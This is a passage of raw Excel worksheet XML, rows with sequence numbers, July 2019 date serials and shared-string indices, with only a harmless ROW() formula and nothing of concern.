        <v>1380</v>
      </c>
      <c r="C11381" t="s">
        <v>19637</v>
      </c>
      <c r="D11381" s="1">
        <v>43672</v>
      </c>
      <c r="E11381" t="s">
        <v>21373</v>
      </c>
      <c r="F11381" t="s">
        <v>10526</v>
      </c>
      <c r="G11381" t="s">
        <v>21374</v>
      </c>
    </row>
    <row r="11382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11382">
        <f t="shared" si="177"/>
        <v>11381</v>
      </c>
      <c r="B11382">
        <v>1381</v>
      </c>
      <c r="C11382" t="s">
        <v>19637</v>
      </c>
      <c r="D11382" s="1">
        <v>43673</v>
      </c>
      <c r="E11382" t="s">
        <v>19690</v>
      </c>
      <c r="F11382" t="s">
        <v>9978</v>
      </c>
      <c r="G11382" t="s">
        <v>21375</v>
      </c>
    </row>
    <row r="11383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11383">
        <f t="shared" si="177"/>
        <v>11382</v>
      </c>
      <c r="B11383">
        <v>1382</v>
      </c>
      <c r="C11383" t="s">
        <v>19637</v>
      </c>
      <c r="D11383" s="1">
        <v>43668</v>
      </c>
      <c r="F11383" t="s">
        <v>10526</v>
      </c>
      <c r="G11383" t="s">
        <v>21376</v>
      </c>
    </row>
    <row r="11384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11384">
        <f t="shared" si="177"/>
        <v>11383</v>
      </c>
      <c r="B11384">
        <v>1383</v>
      </c>
      <c r="C11384" t="s">
        <v>19637</v>
      </c>
      <c r="D11384" s="1">
        <v>43671</v>
      </c>
      <c r="F11384" t="s">
        <v>9978</v>
      </c>
      <c r="G11384" t="s">
        <v>21377</v>
      </c>
    </row>
    <row r="11385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11385">
        <f t="shared" si="177"/>
        <v>11384</v>
      </c>
      <c r="B11385">
        <v>1384</v>
      </c>
      <c r="C11385" t="s">
        <v>19637</v>
      </c>
      <c r="D11385" s="1">
        <v>43669</v>
      </c>
      <c r="E11385" t="s">
        <v>19853</v>
      </c>
      <c r="F11385" t="s">
        <v>10526</v>
      </c>
      <c r="G11385" t="s">
        <v>21378</v>
      </c>
    </row>
    <row r="11386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11386">
        <f t="shared" si="177"/>
        <v>11385</v>
      </c>
      <c r="B11386">
        <v>1385</v>
      </c>
      <c r="C11386" t="s">
        <v>19637</v>
      </c>
      <c r="D11386" s="1">
        <v>43675</v>
      </c>
      <c r="E11386" t="s">
        <v>19781</v>
      </c>
      <c r="F11386" t="s">
        <v>10526</v>
      </c>
      <c r="G11386" t="s">
        <v>21379</v>
      </c>
    </row>
    <row r="11387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11387">
        <f t="shared" si="177"/>
        <v>11386</v>
      </c>
      <c r="B11387">
        <v>1386</v>
      </c>
      <c r="C11387" t="s">
        <v>19637</v>
      </c>
      <c r="D11387" s="1">
        <v>43668</v>
      </c>
      <c r="F11387" t="s">
        <v>10526</v>
      </c>
      <c r="G11387" t="s">
        <v>21380</v>
      </c>
    </row>
    <row r="11388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11388">
        <f t="shared" si="177"/>
        <v>11387</v>
      </c>
      <c r="B11388">
        <v>1387</v>
      </c>
      <c r="C11388" t="s">
        <v>19637</v>
      </c>
      <c r="D11388" s="1">
        <v>43677</v>
      </c>
      <c r="E11388" t="s">
        <v>19640</v>
      </c>
      <c r="F11388" t="s">
        <v>10021</v>
      </c>
      <c r="G11388" t="s">
        <v>21381</v>
      </c>
    </row>
    <row r="11389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11389">
        <f t="shared" si="177"/>
        <v>11388</v>
      </c>
      <c r="B11389">
        <v>1388</v>
      </c>
      <c r="C11389" t="s">
        <v>19637</v>
      </c>
      <c r="D11389" s="1">
        <v>43675</v>
      </c>
      <c r="E11389" t="s">
        <v>21382</v>
      </c>
      <c r="F11389" t="s">
        <v>10021</v>
      </c>
      <c r="G11389" t="s">
        <v>21383</v>
      </c>
    </row>
    <row r="11390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11390">
        <f t="shared" si="177"/>
        <v>11389</v>
      </c>
      <c r="B11390">
        <v>1389</v>
      </c>
      <c r="C11390" t="s">
        <v>19637</v>
      </c>
      <c r="D11390" s="1">
        <v>43668</v>
      </c>
      <c r="E11390" t="s">
        <v>19640</v>
      </c>
      <c r="F11390" t="s">
        <v>9975</v>
      </c>
      <c r="G11390" t="s">
        <v>21384</v>
      </c>
    </row>
    <row r="11391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11391">
        <f t="shared" si="177"/>
        <v>11390</v>
      </c>
      <c r="B11391">
        <v>1390</v>
      </c>
      <c r="C11391" t="s">
        <v>19637</v>
      </c>
      <c r="D11391" s="1">
        <v>43670</v>
      </c>
      <c r="E11391" t="s">
        <v>19672</v>
      </c>
      <c r="F11391" t="s">
        <v>10021</v>
      </c>
      <c r="G11391" t="s">
        <v>21385</v>
      </c>
    </row>
    <row r="11392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11392">
        <f t="shared" si="177"/>
        <v>11391</v>
      </c>
      <c r="B11392">
        <v>1391</v>
      </c>
      <c r="C11392" t="s">
        <v>19637</v>
      </c>
      <c r="D11392" s="1">
        <v>43677</v>
      </c>
      <c r="E11392" t="s">
        <v>21386</v>
      </c>
      <c r="F11392" t="s">
        <v>10526</v>
      </c>
      <c r="G11392" t="s">
        <v>21387</v>
      </c>
    </row>
    <row r="11393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11393">
        <f t="shared" si="177"/>
        <v>11392</v>
      </c>
      <c r="B11393">
        <v>1392</v>
      </c>
      <c r="C11393" t="s">
        <v>19637</v>
      </c>
      <c r="D11393" s="1">
        <v>43671</v>
      </c>
      <c r="E11393" t="s">
        <v>20187</v>
      </c>
      <c r="F11393" t="s">
        <v>9975</v>
      </c>
      <c r="G11393" t="s">
        <v>21388</v>
      </c>
    </row>
    <row r="11394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11394">
        <f t="shared" si="177"/>
        <v>11393</v>
      </c>
      <c r="B11394">
        <v>1393</v>
      </c>
      <c r="C11394" t="s">
        <v>19637</v>
      </c>
      <c r="D11394" s="1">
        <v>43668</v>
      </c>
      <c r="E11394" t="s">
        <v>21389</v>
      </c>
      <c r="F11394" t="s">
        <v>9975</v>
      </c>
      <c r="G11394" t="s">
        <v>21390</v>
      </c>
    </row>
    <row r="11395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11395">
        <f t="shared" ref="A11395:A11458" si="178">+ROW(A11394)</f>
        <v>11394</v>
      </c>
      <c r="B11395">
        <v>1394</v>
      </c>
      <c r="C11395" t="s">
        <v>19637</v>
      </c>
      <c r="D11395" s="1">
        <v>43677</v>
      </c>
      <c r="F11395" t="s">
        <v>10526</v>
      </c>
      <c r="G11395" t="s">
        <v>21391</v>
      </c>
    </row>
    <row r="11396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11396">
        <f t="shared" si="178"/>
        <v>11395</v>
      </c>
      <c r="B11396">
        <v>1395</v>
      </c>
      <c r="C11396" t="s">
        <v>19637</v>
      </c>
      <c r="D11396" s="1">
        <v>43675</v>
      </c>
      <c r="E11396" t="s">
        <v>19640</v>
      </c>
      <c r="F11396" t="s">
        <v>9975</v>
      </c>
      <c r="G11396" t="s">
        <v>21392</v>
      </c>
    </row>
    <row r="11397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11397">
        <f t="shared" si="178"/>
        <v>11396</v>
      </c>
      <c r="B11397">
        <v>1396</v>
      </c>
      <c r="C11397" t="s">
        <v>19637</v>
      </c>
      <c r="D11397" s="1">
        <v>43671</v>
      </c>
      <c r="E11397" t="s">
        <v>21393</v>
      </c>
      <c r="F11397" t="s">
        <v>9978</v>
      </c>
      <c r="G11397" t="s">
        <v>21394</v>
      </c>
    </row>
    <row r="11398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11398">
        <f t="shared" si="178"/>
        <v>11397</v>
      </c>
      <c r="B11398">
        <v>1397</v>
      </c>
      <c r="C11398" t="s">
        <v>19637</v>
      </c>
      <c r="D11398" s="1">
        <v>43676</v>
      </c>
      <c r="E11398" t="s">
        <v>20349</v>
      </c>
      <c r="F11398" t="s">
        <v>9978</v>
      </c>
      <c r="G11398" t="s">
        <v>21395</v>
      </c>
    </row>
    <row r="11399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11399">
        <f t="shared" si="178"/>
        <v>11398</v>
      </c>
      <c r="B11399">
        <v>1398</v>
      </c>
      <c r="C11399" t="s">
        <v>19637</v>
      </c>
      <c r="D11399" s="1">
        <v>43670</v>
      </c>
      <c r="E11399" t="s">
        <v>21396</v>
      </c>
      <c r="F11399" t="s">
        <v>10526</v>
      </c>
      <c r="G11399" t="s">
        <v>21397</v>
      </c>
    </row>
    <row r="11400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11400">
        <f t="shared" si="178"/>
        <v>11399</v>
      </c>
      <c r="B11400">
        <v>1399</v>
      </c>
      <c r="C11400" t="s">
        <v>19637</v>
      </c>
      <c r="D11400" s="1">
        <v>43677</v>
      </c>
      <c r="E11400" t="s">
        <v>19638</v>
      </c>
      <c r="F11400" t="s">
        <v>10021</v>
      </c>
      <c r="G11400" t="s">
        <v>21398</v>
      </c>
    </row>
    <row r="11401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11401">
        <f t="shared" si="178"/>
        <v>11400</v>
      </c>
      <c r="B11401">
        <v>1400</v>
      </c>
      <c r="C11401" t="s">
        <v>19637</v>
      </c>
      <c r="D11401" s="1">
        <v>43672</v>
      </c>
      <c r="E11401" t="s">
        <v>21399</v>
      </c>
      <c r="F11401" t="s">
        <v>10021</v>
      </c>
      <c r="G11401" t="s">
        <v>21400</v>
      </c>
    </row>
    <row r="11402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11402">
        <f t="shared" si="178"/>
        <v>11401</v>
      </c>
      <c r="B11402">
        <v>1401</v>
      </c>
      <c r="C11402" t="s">
        <v>19637</v>
      </c>
      <c r="D11402" s="1">
        <v>43672</v>
      </c>
      <c r="F11402" t="s">
        <v>9978</v>
      </c>
      <c r="G11402" t="s">
        <v>21401</v>
      </c>
    </row>
    <row r="11403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11403">
        <f t="shared" si="178"/>
        <v>11402</v>
      </c>
      <c r="B11403">
        <v>1402</v>
      </c>
      <c r="C11403" t="s">
        <v>19637</v>
      </c>
      <c r="D11403" s="1">
        <v>43676</v>
      </c>
      <c r="E11403" t="s">
        <v>19640</v>
      </c>
      <c r="F11403" t="s">
        <v>10021</v>
      </c>
      <c r="G11403" t="s">
        <v>21402</v>
      </c>
    </row>
    <row r="11404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11404">
        <f t="shared" si="178"/>
        <v>11403</v>
      </c>
      <c r="B11404">
        <v>1403</v>
      </c>
      <c r="C11404" t="s">
        <v>19637</v>
      </c>
      <c r="D11404" s="1">
        <v>43671</v>
      </c>
      <c r="E11404" t="s">
        <v>19917</v>
      </c>
      <c r="F11404" t="s">
        <v>9975</v>
      </c>
      <c r="G11404" t="s">
        <v>21403</v>
      </c>
    </row>
    <row r="11405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11405">
        <f t="shared" si="178"/>
        <v>11404</v>
      </c>
      <c r="B11405">
        <v>1404</v>
      </c>
      <c r="C11405" t="s">
        <v>19637</v>
      </c>
      <c r="D11405" s="1">
        <v>43674</v>
      </c>
      <c r="E11405" t="s">
        <v>19917</v>
      </c>
      <c r="F11405" t="s">
        <v>9975</v>
      </c>
      <c r="G11405" t="s">
        <v>21404</v>
      </c>
    </row>
    <row r="11406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11406">
        <f t="shared" si="178"/>
        <v>11405</v>
      </c>
      <c r="B11406">
        <v>1405</v>
      </c>
      <c r="C11406" t="s">
        <v>19637</v>
      </c>
      <c r="D11406" s="1">
        <v>43673</v>
      </c>
      <c r="E11406" t="s">
        <v>20488</v>
      </c>
      <c r="F11406" t="s">
        <v>10526</v>
      </c>
      <c r="G11406" t="s">
        <v>21405</v>
      </c>
    </row>
    <row r="11407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11407">
        <f t="shared" si="178"/>
        <v>11406</v>
      </c>
      <c r="B11407">
        <v>1406</v>
      </c>
      <c r="C11407" t="s">
        <v>19637</v>
      </c>
      <c r="D11407" s="1">
        <v>43675</v>
      </c>
      <c r="E11407" t="s">
        <v>19640</v>
      </c>
      <c r="F11407" t="s">
        <v>9975</v>
      </c>
      <c r="G11407" t="s">
        <v>21406</v>
      </c>
    </row>
    <row r="11408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11408">
        <f t="shared" si="178"/>
        <v>11407</v>
      </c>
      <c r="B11408">
        <v>1407</v>
      </c>
      <c r="C11408" t="s">
        <v>19637</v>
      </c>
      <c r="D11408" s="1">
        <v>43674</v>
      </c>
      <c r="E11408" t="s">
        <v>19643</v>
      </c>
      <c r="F11408" t="s">
        <v>10021</v>
      </c>
      <c r="G11408" t="s">
        <v>21407</v>
      </c>
    </row>
    <row r="11409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11409">
        <f t="shared" si="178"/>
        <v>11408</v>
      </c>
      <c r="B11409">
        <v>1408</v>
      </c>
      <c r="C11409" t="s">
        <v>19637</v>
      </c>
      <c r="D11409" s="1">
        <v>43672</v>
      </c>
      <c r="E11409" t="s">
        <v>19640</v>
      </c>
      <c r="F11409" t="s">
        <v>10021</v>
      </c>
      <c r="G11409" t="s">
        <v>21408</v>
      </c>
    </row>
    <row r="11410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11410">
        <f t="shared" si="178"/>
        <v>11409</v>
      </c>
      <c r="B11410">
        <v>1409</v>
      </c>
      <c r="C11410" t="s">
        <v>19637</v>
      </c>
      <c r="D11410" s="1">
        <v>43672</v>
      </c>
      <c r="E11410" t="s">
        <v>21409</v>
      </c>
      <c r="F11410" t="s">
        <v>9975</v>
      </c>
      <c r="G11410" t="s">
        <v>21410</v>
      </c>
    </row>
    <row r="11411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11411">
        <f t="shared" si="178"/>
        <v>11410</v>
      </c>
      <c r="B11411">
        <v>1410</v>
      </c>
      <c r="C11411" t="s">
        <v>19637</v>
      </c>
      <c r="D11411" s="1">
        <v>43673</v>
      </c>
      <c r="E11411" t="s">
        <v>19741</v>
      </c>
      <c r="F11411" t="s">
        <v>9975</v>
      </c>
      <c r="G11411" t="s">
        <v>21411</v>
      </c>
    </row>
    <row r="11412" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11412">
        <f t="shared" si="178"/>
        <v>11411</v>
      </c>
      <c r="B11412">
        <v>1411</v>
      </c>
      <c r="C11412" t="s">
        <v>19637</v>
      </c>
      <c r="D11412" s="1">
        <v>43668</v>
      </c>
      <c r="E11412" t="s">
        <v>19650</v>
      </c>
      <c r="F11412" t="s">
        <v>10021</v>
      </c>
      <c r="G11412" t="s">
        <v>21412</v>
      </c>
    </row>
    <row r="11413" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11413">
        <f t="shared" si="178"/>
        <v>11412</v>
      </c>
      <c r="B11413">
        <v>1412</v>
      </c>
      <c r="C11413" t="s">
        <v>19637</v>
      </c>
      <c r="D11413" s="1">
        <v>43668</v>
      </c>
      <c r="F11413" t="s">
        <v>10526</v>
      </c>
      <c r="G11413" t="s">
        <v>21413</v>
      </c>
    </row>
    <row r="11414" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11414">
        <f t="shared" si="178"/>
        <v>11413</v>
      </c>
      <c r="B11414">
        <v>1413</v>
      </c>
      <c r="C11414" t="s">
        <v>19637</v>
      </c>
      <c r="D11414" s="1">
        <v>43677</v>
      </c>
      <c r="E11414" t="s">
        <v>21051</v>
      </c>
      <c r="F11414" t="s">
        <v>9978</v>
      </c>
      <c r="G11414" t="s">
        <v>21414</v>
      </c>
    </row>
    <row r="11415" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11415">
        <f t="shared" si="178"/>
        <v>11414</v>
      </c>
      <c r="B11415">
        <v>1414</v>
      </c>
      <c r="C11415" t="s">
        <v>19637</v>
      </c>
      <c r="D11415" s="1">
        <v>43669</v>
      </c>
      <c r="E11415" t="s">
        <v>21415</v>
      </c>
      <c r="F11415" t="s">
        <v>10021</v>
      </c>
      <c r="G11415" t="s">
        <v>21416</v>
      </c>
    </row>
    <row r="11416" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11416">
        <f t="shared" si="178"/>
        <v>11415</v>
      </c>
      <c r="B11416">
        <v>1415</v>
      </c>
      <c r="C11416" t="s">
        <v>19637</v>
      </c>
      <c r="D11416" s="1">
        <v>43669</v>
      </c>
      <c r="E11416" t="s">
        <v>21417</v>
      </c>
      <c r="F11416" t="s">
        <v>10526</v>
      </c>
      <c r="G11416" t="s">
        <v>21418</v>
      </c>
    </row>
    <row r="11417" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11417">
        <f t="shared" si="178"/>
        <v>11416</v>
      </c>
      <c r="B11417">
        <v>1416</v>
      </c>
      <c r="C11417" t="s">
        <v>19637</v>
      </c>
      <c r="D11417" s="1">
        <v>43675</v>
      </c>
      <c r="E11417" t="s">
        <v>21419</v>
      </c>
      <c r="F11417" t="s">
        <v>10526</v>
      </c>
      <c r="G11417" t="s">
        <v>21420</v>
      </c>
    </row>
    <row r="11418" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11418">
        <f t="shared" si="178"/>
        <v>11417</v>
      </c>
      <c r="B11418">
        <v>1417</v>
      </c>
      <c r="C11418" t="s">
        <v>19637</v>
      </c>
      <c r="D11418" s="1">
        <v>43677</v>
      </c>
      <c r="E11418" t="s">
        <v>19974</v>
      </c>
      <c r="F11418" t="s">
        <v>9978</v>
      </c>
      <c r="G11418" t="s">
        <v>21421</v>
      </c>
    </row>
    <row r="11419" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11419">
        <f t="shared" si="178"/>
        <v>11418</v>
      </c>
      <c r="B11419">
        <v>1418</v>
      </c>
      <c r="C11419" t="s">
        <v>19637</v>
      </c>
      <c r="D11419" s="1">
        <v>43675</v>
      </c>
      <c r="E11419" t="s">
        <v>21422</v>
      </c>
      <c r="F11419" t="s">
        <v>10526</v>
      </c>
      <c r="G11419" t="s">
        <v>21423</v>
      </c>
    </row>
    <row r="11420" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11420">
        <f t="shared" si="178"/>
        <v>11419</v>
      </c>
      <c r="B11420">
        <v>1419</v>
      </c>
      <c r="C11420" t="s">
        <v>19637</v>
      </c>
      <c r="D11420" s="1">
        <v>43675</v>
      </c>
      <c r="E11420" t="s">
        <v>19645</v>
      </c>
      <c r="F11420" t="s">
        <v>9975</v>
      </c>
      <c r="G11420" t="s">
        <v>21424</v>
      </c>
    </row>
    <row r="11421" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11421">
        <f t="shared" si="178"/>
        <v>11420</v>
      </c>
      <c r="B11421">
        <v>1420</v>
      </c>
      <c r="C11421" t="s">
        <v>19637</v>
      </c>
      <c r="D11421" s="1">
        <v>43672</v>
      </c>
      <c r="E11421" t="s">
        <v>19705</v>
      </c>
      <c r="F11421" t="s">
        <v>10021</v>
      </c>
      <c r="G11421" t="s">
        <v>21425</v>
      </c>
    </row>
    <row r="11422" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11422">
        <f t="shared" si="178"/>
        <v>11421</v>
      </c>
      <c r="B11422">
        <v>1421</v>
      </c>
      <c r="C11422" t="s">
        <v>19637</v>
      </c>
      <c r="D11422" s="1">
        <v>43669</v>
      </c>
      <c r="E11422" t="s">
        <v>21426</v>
      </c>
      <c r="F11422" t="s">
        <v>10526</v>
      </c>
      <c r="G11422" t="s">
        <v>21427</v>
      </c>
    </row>
    <row r="11423" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11423">
        <f t="shared" si="178"/>
        <v>11422</v>
      </c>
      <c r="B11423">
        <v>1422</v>
      </c>
      <c r="C11423" t="s">
        <v>19637</v>
      </c>
      <c r="D11423" s="1">
        <v>43673</v>
      </c>
      <c r="E11423" t="s">
        <v>21428</v>
      </c>
      <c r="F11423" t="s">
        <v>10021</v>
      </c>
      <c r="G11423" t="s">
        <v>21429</v>
      </c>
    </row>
    <row r="11424" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11424">
        <f t="shared" si="178"/>
        <v>11423</v>
      </c>
      <c r="B11424">
        <v>1423</v>
      </c>
      <c r="C11424" t="s">
        <v>19637</v>
      </c>
      <c r="D11424" s="1">
        <v>43670</v>
      </c>
      <c r="E11424" t="s">
        <v>19717</v>
      </c>
      <c r="F11424" t="s">
        <v>10526</v>
      </c>
      <c r="G11424" t="s">
        <v>21430</v>
      </c>
    </row>
    <row r="11425" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11425">
        <f t="shared" si="178"/>
        <v>11424</v>
      </c>
      <c r="B11425">
        <v>1424</v>
      </c>
      <c r="C11425" t="s">
        <v>19637</v>
      </c>
      <c r="D11425" s="1">
        <v>43670</v>
      </c>
      <c r="E11425" t="s">
        <v>21431</v>
      </c>
      <c r="F11425" t="s">
        <v>10021</v>
      </c>
      <c r="G11425" t="s">
        <v>21432</v>
      </c>
    </row>
    <row r="11426" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11426">
        <f t="shared" si="178"/>
        <v>11425</v>
      </c>
      <c r="B11426">
        <v>1425</v>
      </c>
      <c r="C11426" t="s">
        <v>19637</v>
      </c>
      <c r="D11426" s="1">
        <v>43668</v>
      </c>
      <c r="E11426" t="s">
        <v>21051</v>
      </c>
      <c r="F11426" t="s">
        <v>9978</v>
      </c>
      <c r="G11426" t="s">
        <v>21433</v>
      </c>
    </row>
    <row r="11427" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11427">
        <f t="shared" si="178"/>
        <v>11426</v>
      </c>
      <c r="B11427">
        <v>1426</v>
      </c>
      <c r="C11427" t="s">
        <v>19637</v>
      </c>
      <c r="D11427" s="1">
        <v>43674</v>
      </c>
      <c r="E11427" t="s">
        <v>21434</v>
      </c>
      <c r="F11427" t="s">
        <v>10526</v>
      </c>
      <c r="G11427" t="s">
        <v>21435</v>
      </c>
    </row>
    <row r="11428" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11428">
        <f t="shared" si="178"/>
        <v>11427</v>
      </c>
      <c r="B11428">
        <v>1427</v>
      </c>
      <c r="C11428" t="s">
        <v>19637</v>
      </c>
      <c r="D11428" s="1">
        <v>43674</v>
      </c>
      <c r="E11428" t="s">
        <v>19650</v>
      </c>
      <c r="F11428" t="s">
        <v>10021</v>
      </c>
      <c r="G11428" t="s">
        <v>21436</v>
      </c>
    </row>
    <row r="11429" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11429">
        <f t="shared" si="178"/>
        <v>11428</v>
      </c>
      <c r="B11429">
        <v>1428</v>
      </c>
      <c r="C11429" t="s">
        <v>19637</v>
      </c>
      <c r="D11429" s="1">
        <v>43671</v>
      </c>
      <c r="E11429" t="s">
        <v>20751</v>
      </c>
      <c r="F11429" t="s">
        <v>10021</v>
      </c>
      <c r="G11429" t="s">
        <v>21437</v>
      </c>
    </row>
    <row r="11430" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11430">
        <f t="shared" si="178"/>
        <v>11429</v>
      </c>
      <c r="B11430">
        <v>1429</v>
      </c>
      <c r="C11430" t="s">
        <v>19637</v>
      </c>
      <c r="D11430" s="1">
        <v>43669</v>
      </c>
      <c r="F11430" t="s">
        <v>10021</v>
      </c>
      <c r="G11430" t="s">
        <v>21438</v>
      </c>
    </row>
    <row r="11431" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11431">
        <f t="shared" si="178"/>
        <v>11430</v>
      </c>
      <c r="B11431">
        <v>1430</v>
      </c>
      <c r="C11431" t="s">
        <v>19637</v>
      </c>
      <c r="D11431" s="1">
        <v>43668</v>
      </c>
      <c r="E11431" t="s">
        <v>19640</v>
      </c>
      <c r="F11431" t="s">
        <v>9975</v>
      </c>
      <c r="G11431" t="s">
        <v>21439</v>
      </c>
    </row>
    <row r="11432" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11432">
        <f t="shared" si="178"/>
        <v>11431</v>
      </c>
      <c r="B11432">
        <v>1431</v>
      </c>
      <c r="C11432" t="s">
        <v>19637</v>
      </c>
      <c r="D11432" s="1">
        <v>43669</v>
      </c>
      <c r="E11432" t="s">
        <v>19650</v>
      </c>
      <c r="F11432" t="s">
        <v>10021</v>
      </c>
      <c r="G11432" t="s">
        <v>21440</v>
      </c>
    </row>
    <row r="11433" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11433">
        <f t="shared" si="178"/>
        <v>11432</v>
      </c>
      <c r="B11433">
        <v>1432</v>
      </c>
      <c r="C11433" t="s">
        <v>19637</v>
      </c>
      <c r="D11433" s="1">
        <v>43670</v>
      </c>
      <c r="E11433" t="s">
        <v>20187</v>
      </c>
      <c r="F11433" t="s">
        <v>9975</v>
      </c>
      <c r="G11433" t="s">
        <v>21441</v>
      </c>
    </row>
    <row r="11434" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11434">
        <f t="shared" si="178"/>
        <v>11433</v>
      </c>
      <c r="B11434">
        <v>1433</v>
      </c>
      <c r="C11434" t="s">
        <v>19637</v>
      </c>
      <c r="D11434" s="1">
        <v>43670</v>
      </c>
      <c r="E11434" t="s">
        <v>19741</v>
      </c>
      <c r="F11434" t="s">
        <v>9975</v>
      </c>
      <c r="G11434" t="s">
        <v>21442</v>
      </c>
    </row>
    <row r="11435" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11435">
        <f t="shared" si="178"/>
        <v>11434</v>
      </c>
      <c r="B11435">
        <v>1434</v>
      </c>
      <c r="C11435" t="s">
        <v>19637</v>
      </c>
      <c r="D11435" s="1">
        <v>43675</v>
      </c>
      <c r="F11435" t="s">
        <v>10526</v>
      </c>
      <c r="G11435" t="s">
        <v>21443</v>
      </c>
    </row>
    <row r="11436" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11436">
        <f t="shared" si="178"/>
        <v>11435</v>
      </c>
      <c r="B11436">
        <v>1435</v>
      </c>
      <c r="C11436" t="s">
        <v>19637</v>
      </c>
      <c r="D11436" s="1">
        <v>43676</v>
      </c>
      <c r="E11436" t="s">
        <v>21444</v>
      </c>
      <c r="F11436" t="s">
        <v>10526</v>
      </c>
      <c r="G11436" t="s">
        <v>21445</v>
      </c>
    </row>
    <row r="11437" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11437">
        <f t="shared" si="178"/>
        <v>11436</v>
      </c>
      <c r="B11437">
        <v>1436</v>
      </c>
      <c r="C11437" t="s">
        <v>19637</v>
      </c>
      <c r="D11437" s="1">
        <v>43671</v>
      </c>
      <c r="E11437" t="s">
        <v>19860</v>
      </c>
      <c r="F11437" t="s">
        <v>10526</v>
      </c>
      <c r="G11437" t="s">
        <v>21446</v>
      </c>
    </row>
    <row r="11438" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11438">
        <f t="shared" si="178"/>
        <v>11437</v>
      </c>
      <c r="B11438">
        <v>1437</v>
      </c>
      <c r="C11438" t="s">
        <v>19637</v>
      </c>
      <c r="D11438" s="1">
        <v>43670</v>
      </c>
      <c r="E11438" t="s">
        <v>20970</v>
      </c>
      <c r="F11438" t="s">
        <v>9978</v>
      </c>
      <c r="G11438" t="s">
        <v>21447</v>
      </c>
    </row>
    <row r="11439" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11439">
        <f t="shared" si="178"/>
        <v>11438</v>
      </c>
      <c r="B11439">
        <v>1438</v>
      </c>
      <c r="C11439" t="s">
        <v>19637</v>
      </c>
      <c r="D11439" s="1">
        <v>43668</v>
      </c>
      <c r="E11439" t="s">
        <v>19640</v>
      </c>
      <c r="F11439" t="s">
        <v>9975</v>
      </c>
      <c r="G11439" t="s">
        <v>21448</v>
      </c>
    </row>
    <row r="11440" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11440">
        <f t="shared" si="178"/>
        <v>11439</v>
      </c>
      <c r="B11440">
        <v>1439</v>
      </c>
      <c r="C11440" t="s">
        <v>19637</v>
      </c>
      <c r="D11440" s="1">
        <v>43669</v>
      </c>
      <c r="F11440" t="s">
        <v>10526</v>
      </c>
      <c r="G11440" t="s">
        <v>21449</v>
      </c>
    </row>
    <row r="11441" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11441">
        <f t="shared" si="178"/>
        <v>11440</v>
      </c>
      <c r="B11441">
        <v>1440</v>
      </c>
      <c r="C11441" t="s">
        <v>19637</v>
      </c>
      <c r="D11441" s="1">
        <v>43668</v>
      </c>
      <c r="E11441" t="s">
        <v>19640</v>
      </c>
      <c r="F11441" t="s">
        <v>10021</v>
      </c>
      <c r="G11441" t="s">
        <v>21450</v>
      </c>
    </row>
    <row r="11442" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11442">
        <f t="shared" si="178"/>
        <v>11441</v>
      </c>
      <c r="B11442">
        <v>1441</v>
      </c>
      <c r="C11442" t="s">
        <v>19637</v>
      </c>
      <c r="D11442" s="1">
        <v>43670</v>
      </c>
      <c r="E11442" t="s">
        <v>19849</v>
      </c>
      <c r="F11442" t="s">
        <v>10021</v>
      </c>
      <c r="G11442" t="s">
        <v>21451</v>
      </c>
    </row>
    <row r="11443" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11443">
        <f t="shared" si="178"/>
        <v>11442</v>
